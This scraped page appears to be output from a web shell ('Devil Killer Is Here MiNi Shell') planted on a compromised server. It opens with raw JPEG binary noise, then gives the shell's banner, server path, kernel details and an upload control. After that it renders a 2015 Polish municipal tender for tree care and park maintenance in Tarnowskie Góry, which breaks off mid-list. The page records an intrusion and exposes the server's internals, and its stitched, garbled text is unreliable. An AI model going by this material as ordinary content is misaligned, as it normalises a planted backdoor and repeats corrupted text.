JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150422/56847-N-2015.html

<p class="kh_header"><b>Tarnowskie Góry: Zabiegi pielęgnacyjno - konserwatorskie zabytkowych drzewostanów w Tarnowskich Górach oraz utrzymanie  zieleni, infrastruktury i ścianie drzew w  Parku w  Reptach Śląskich</b><br>
<b>Numer ogłoszenia: 56847 - 2015; data zamieszczenia: 22.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Tarnowskie Góry , Rynek 4, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 3933600, 3933855, faks 032 3933602.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.tarnowskiegory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zabiegi pielęgnacyjno - konserwatorskie zabytkowych drzewostanów w Tarnowskich Górach oraz utrzymanie  zieleni, infrastruktury i ścianie drzew w  Parku w  Reptach Śląskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest świadczenie usług polegających na  wykonaniu zbiegów pielęgnacyjno - konserwatorskich zabytkowych drzewostanów w Parku repeckim i alei lipowej przy ul. Lipowej oraz utrzymaniu zieleni, infrastruktury wraz z ścinaniem drzew w Parku repeckim przy ul. Śniadeckiego. Cały zakres prac został podzielony przez Zamawiającego na trzy odrębne zadania.
Zadanie  1
Przedmiotem zamówienia jest utrzymanie zieleni i infrastruktury oraz ścinanie drzew w Parku w Reptach -Tarnowskich Górach w latach 2015 - kwiecień 2016 r., w tym:
1) Koszenie łąk parkowych w dolinie Dramy - 5,80 ha
2) Koszenie trawników parkowych - 2,10 ha
3) Koszenie trawy, chwastów i jednorocznych samosiewów na terenie parku - 31.270 m2 
4) Cięcia odmładzające krzewów - 300 szt.
5) Pielęgnacja krzewów żywopłotowych z ligustru pospolitego - 1 543,60 m2 , 
6) Pielęgnacja kwietników bylinowych ziemnych i w gazonach - 479,29 m2 ,
7) Wyłożenie feromonów na kornika drukarza -50 szt.
8) Pielęgnacja nasadzeń odnowieniowych  - 6.050  m2 ,
9) Czyszczenie terenu z podrostów - 2,60 ha
10) Czyszczenie wczesne - 1,40 ha
11) Zwalczanie rdestowa ostrokończastego - 0,20 ha
12) Ochrona drzew kasztanowca białego - 100 szt. przez:
a) wyłożenie  feromonów na szrotówka - 200 szt.
b) wygrabienie liści spod 100 szt. drzew kasztanowca białego - 10200 m2,
13) Wygrabianie liści z trawników - 0,55 ha
14) Konserwacja rowów melioracyjnych i przepustów o łącznej długości 1.227,30 mb, w tym: a) rowy - 1.130,00 mb
b) przepusty - 97,30 mb 
c) wykaszanie ze skarp rowów - 3955 m2 .
15) Wycinki drzew iglastych -65 szt.
16) Wycinka drzew liściastych - 115 szt.
17) Wyrób drewna wg sortymentów - 333 m3,   
18) Zakładanie trawnika dywanowego siewem - 100 m2  
19) Frezowanie pni drzew - 12.000 cm2 
20. Sadzenie drzew - 17 szt.
21) Utrzymanie czystości:
a) oczyszczanie alejek parkowych i parkingu  - 35.350,00 m2 , 
b) oczyszczanie schodów  -16.200,00 m2,   
c) oczyszczanie parku - 115 ha,
22) Montaż i naprawienie ławek parkowych - 7 szt.
23) Wykonanie innych prac na terenie parku - 70,00 r-g
Zadanie 2 
Przedmiotem zamówienia jest wykonanie zabiegów pielęgnacyjno - konserwatorskich starodrzewu zabytkowego parku w Tarnowskich Górach - Reptach w 2015 r. polegających na wykonaniu cięć sanitarnych i technicznych 119 szt. drzew różnych gatunków rosnących w obrębie Parku w Reptach, głównie wzdłuż alejek parkowych, w tym:
1) cięcia sanitarne - 116 szt. drzew,
2) cięcia techniczne (skrajnia alejek) - 3 szt. drzew,
Zadanie  3
Przedmiotem zamówienia jest wykonanie zabiegów pielęgnacyjno-konserwatorskich starodrzewu alei lipowej i posadzenie drzew przy ul. Lipowej w Tarnowskich Górach w 2015r. w tym:
1) wykonanie różnych kombinacji cięć sanitarno-pielęgnacyjnych, korekcyjnych, redukcyjnych, technicznych,  prześwietlających pędy juwenilne połączone z usuwaniem gniazd jemioły, zamontowaniem w koronach drzew wiązań typu COBRAR lub równoważnych oraz odsłonięciem szyi korzeniowych i usunięciem odrostów korzeniowych, w tym:
- cięcia pielęgnacyjno-sanitarne  - CPS - na 36 szt. drzew,
- cięcia korekcyjne - KK - na 13 szt. drzew,
- cięcia redukcyjne - Rh - na 14 szt. drzew, w tym:
- obniżenie korony o min. 2 m - 8 szt. drzew,
- obniżenie korony o min. 3 m -  3 szt. drzew,
- obniżenie korony o min. 4 m - 3 szt. drzew,
- cięcia prześwietlające - prześwietlenie - 22 szt. drzew 
- cięcia techniczne (skrajnia pozioma i pionowa od str. sąsiadującej posesji) - T - 2 szt. drzew,
- zamontowanie w koronach 5 szt. drzew wiązań lub systemu wiązań dynamicznych lub statycznych typu COBRA R lub równoważnych - Wz - łącznie 9 szt. wiązań o wytrzymałości 2 lub 4 tony,
- odsłonięcie szyi korzeniowej - odsłonięcie - 8 szt. drzew,
- usunięcie gniazd jemioły z korony drzewa - jemioła - 10 szt. drzew,
- usunięcie odrostów korzeniowych - odrosty - 10 szt. drzew,
2) posadzenie drzew lip drobnolistnych zakupionych przez Zamawiającego - 8 szt. 
Szczegółowe opisy (oddzielne dla każdego zadania) przedmiotu zamówienia zawarte są w załącznikach Opis przedmiotu zamówienia Zadanie 1 itd. wraz z przedmiarami, oraz wzorami umów.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp. 
a) dla Zadania 1 przewiduje się udzielenie zamówienia uzupełniającego w wysokości do 30 % wartości zamówienia podstawowego (zakres prac - koszenie, wycinki drzew i wyrób drewna,  oczyszczanie alejek parkowych i parkingu, montaż i naprawianie ławek).
b)  dla Zadania 2 przewiduje się udzielenie zamówienia uzupełniającego w wysokości do 30 % wartości zamówienia podstawowego (zakres prac - cięcia sanitarne i techniczne drzew</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.21.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: zadanie 1 - 3.000,00 zł, zadanie 2 - 900,00 zł, zadanie 3 - 900,00 zł. Wadium musi obejmować cały okres związania ofertą. Termin wniesienia wadium upływa dnia 06.05.2015 r. o godz. 10:00. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data i godzina wpływu środków na rachunek Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi  posiadać  aktualną decyzję właściwego starosty w zakresie transportu odpadów uwzględnionych  w opisie przedmiotu  zamówienia, zgodnie z ustawą o odpadach z 14 grudnia 2012 r. (Dz.U. z 2013 r. , poz. 21). Wyżej wymieniony warunek posiadania uprawnień do wykonywania określonej działalności lub czynności dotyczy wyłącznie Wykonawcy składającego ofertę na zadanie 1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał: dla zadania 1: co najmniej jedną usługę obejmującą swym zakresem: koszenie łąk i trawników, cięcia pielęgnacyjne krzewów żywopłotowych, zyszczenia terenu z podrostu lub czyszczenia wczesne, ścinanie drzew i wyrób drewna ze ścinanych drzew. 
Wartość wykazanej usługi (łącznie) nie może być mniejsza niż 30.000,00 zł brutto.
W/w warunek udziału zostanie spełniony jeśli Wykonawca wykaże wykonanie  powyższych usług łącznie lub każdej z osobna.
dla zadania 2 i 3: co najmniej jedną usługę obejmującą swym zakresem konserwację parków zabytkowych albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków, które powinny obejmować m.in.: cięcia pielęgnacyjno konserwatorskie drzew.
Wartość wykazanej usługi nie może być mniejsza niż 10.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) potencjałem technicznym w celu realizacji zamówienia tj. wykazać dysponowanie co najmniej następującym sprzętem: dla zadania 1 - samochód samowyładowczy lub skrzyniowy do 5 ton- min. 1szt., ciągnik kołowy z przyczepą - min. 1szt., nożyce spalinowe do żywopłotu -  min. 2szt., kosiarka spalinowa na wysięgniku - min.1 szt., kosiarka spalinowa samojezdna -  min 1szt., kosiarka rotacyjna-ciągniona - min. 1szt., piła spalinowa - min. 3 szt., rębarka - min. 1szt., frezarka - 1 szt. dla zadania 2 i 3: samochód samowyładowczy lub skrzyniowy do 5 ton - 1szt., ciągnik kołowy z przyczepą  - 1szt., piła spalinowa min. 3 szt., podnośnik min. 1 szt. rębarka  min. 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia tj. co najmniej: dla zadania 1: 1 osobą - (kierownik robót) o wykształceniu min. średnim ogrodniczym lub leśnym, która będzie bezpośrednio kierowała robotami na terenie objętym przedmiotem zamówienia, 3 osobami - posiadającymi uprawnienia pilarza, 
dla zadania 2 i 3: 1 osobą (kierownik robót) posiadającą kwalifikacje określone w § 23.1 lub § 31 Rozporządzenia Ministra Kultury i Dziedzictwa  Narodowego z dnia 27 lipca 2011 r. (Dz.U. z 2011 r., Nr 165, poz. 987 z późn. zm.), która będzie bezpośrednio  kierował robotami na terenie objętym przedmiotem zamówienia, 2 osobami (do prac technicznych) posiadającymi kwalifikacje określone w  § 23.2 lub § 31 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. (Dz.U.  z 2011r., Nr 165,  poz. 987 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>dla zadania 1:  co najmniej jedną usługę obejmującą swym zakresem: koszenie łąk i trawników, cięcia pielęgnacyjne krzewów żywopłotowych, czyszczenia terenu z podrostu lub czyszczenia wczesne, ścinanie drzew i wyrób drewna ze ścinanych drzew. Wartość wykazanej usługi (łącznie) nie może być mniejsza niż 30.000,00 zł brutto. W/w warunek udziału zostanie spełniony jeśli Wykonawca wykaże wykonanie  powyższych usług łącznie lub każdej z osobna. 
dla zadania 2 i 3: o najmniej jedną usługę obejmującą swym zakresem konserwację parków zabytkowych albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków, które powinny obejmować m.in.: cięcia pielęgnacyjno konserwatorskie drzew.
Wartość wykazanej usługi nie może być mniejsza niż 10.000,00 zł brutto.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz Oferty. Pełnomocnictwo ustanowione do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii potwierdzonej za zgodność z oryginałem notarialnie. Kosztorys ofertowy sporządzony w formie kosztorysu uproszczonego zgodnie z załączonym przedmiarem. Zgodnie z art. 26 ust. 2b ustawy Pzp wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich podczas wykonywania przedmiotowego zamówienia. Zobowiązanie to powinno wskazywać na faktyczną dostępność tych zasobów na użytek wykonawcy w celu realizacji zamówienia, określać zakres i formę udostępniania zasobów oraz okres jakiego to zobowiązanie dotyczy. Powyższe oznacza, iż wykonawca celem udowodnienia zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji danego zamówienia, o ile korzysta z zasobów innych podmiotów, jest zobowiązany do przedłożenia stosownego oświadczenia tych podmiotów w formie pisemnego zobowiązania. Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewidywane możliwości dokonania zmian w zawartej umowie: Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, zgodnie z warunkami podanymi poniżej: Zmiana wynagrodzenia wykonawcy - może nastąpić w przypadku: ustawowej zmiany stawki podatku VAT o wielkość tej zmiany. Zmiany osób wyznaczonych przez Zamawiającego i Wykonawcę do nadzorowania i kontaktów roboczych w trakcie realizacji zamówienia. Osoby wyznaczone i wpisane do umowy jako osoby nadzorujące lub współpracujące w zakresie realizacji przedmiotu zamówienia mogą być zmienione zarówno przez Zamawiającego i Wykonawcę. Zmiana osób wyznaczonych do współpracy może nastąpić po uprzednim pisemnym zawiadomieniu strony przeciwnej (zgodnie z § 5. 3 wzoru umowy). Zmiana nie wymaga akceptacji strony przeciwnej. Zamawiający przewiduje również możliwość zmiany postanowień umowy w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.tarnowskiegory.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tarnowskich Górach, ul. Rynek 4, 42-600 Tarnowskie Góry, Biuro Zamówień Publicznych, pok. 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2015 godzina 10:00, miejsce: Urząd Miejski w Tarnowskich Górach, ul. Rynek 4, 42-600 Tarnowskie Góry, Biuro Zamówień Publicznych, pok. 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> utrzymanie zieleni i infrastruktury oraz ścinanie drzew w Parku w Reptach -Tarnowskich Górach w latach 2015 - kwiecień 2016 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie zieleni i infrastruktury oraz ścinanie drzew w Parku w Reptach -Tarnowskich Górach w latach 2015 - kwiecień 2016 r., w tym:
1) Koszenie łąk parkowych w dolinie Dramy - 5,80 ha
2) Koszenie trawników parkowych - 2,10 ha
3) Koszenie trawy, chwastów i jednorocznych samosiewów na terenie parku - 31.270 m2 
4) Cięcia odmładzające krzewów - 300 szt.
5) Pielęgnacja krzewów żywopłotowych z ligustru pospolitego - 1 543,60 m2 , 
6) Pielęgnacja kwietników bylinowych ziemnych i w gazonach - 479,29 m2 ,
7) Wyłożenie feromonów na kornika drukarza -50 szt.
8) Pielęgnacja nasadzeń odnowieniowych  - 6.050  m2 ,
9) Czyszczenie terenu z podrostów - 2,60 ha
10) Czyszczenie wczesne - 1,40 ha
11) Zwalczanie rdestowa ostrokończastego - 0,20 ha
12) Ochrona drzew kasztanowca białego - 100 szt. przez:
      a) wyłożenie  feromonów na szrotówka - 200 szt.
      b) wygrabienie liści spod 100 szt. drzew kasztanowca białego - 10200 m2,
13) Wygrabianie liści z trawników - 0,55 ha
14) Konserwacja rowów melioracyjnych i przepustów o łącznej długości 1.227,30 mb, w tym:
      a) rowy - 1.130,00 mb
b) przepusty - 97,30 mb 
c) wykaszanie ze skarp rowów - 3955 m2 .
15) Wycinki drzew iglastych -65 szt.
16) Wycinka drzew liściastych - 115 szt.
17) Wyrób drewna wg sortymentów - 333 m3,   
18) Zakładanie trawnika dywanowego siewem - 100 m2  
19) Frezowanie pni drzew - 12.000 cm2 
20. Sadzenie drzew - 17 szt.
21) Utrzymanie czystości:
a) oczyszczanie alejek parkowych i parkingu  - 35.350,00 m2 , 
b) oczyszczanie schodów  -16.200,00 m2,   
c) oczyszczanie parku - 115 ha,
22) Montaż i naprawienie ławek parkowych - 7 szt.
23) Wykonanie innych prac na terenie parku - 70,00 r-g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.21.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
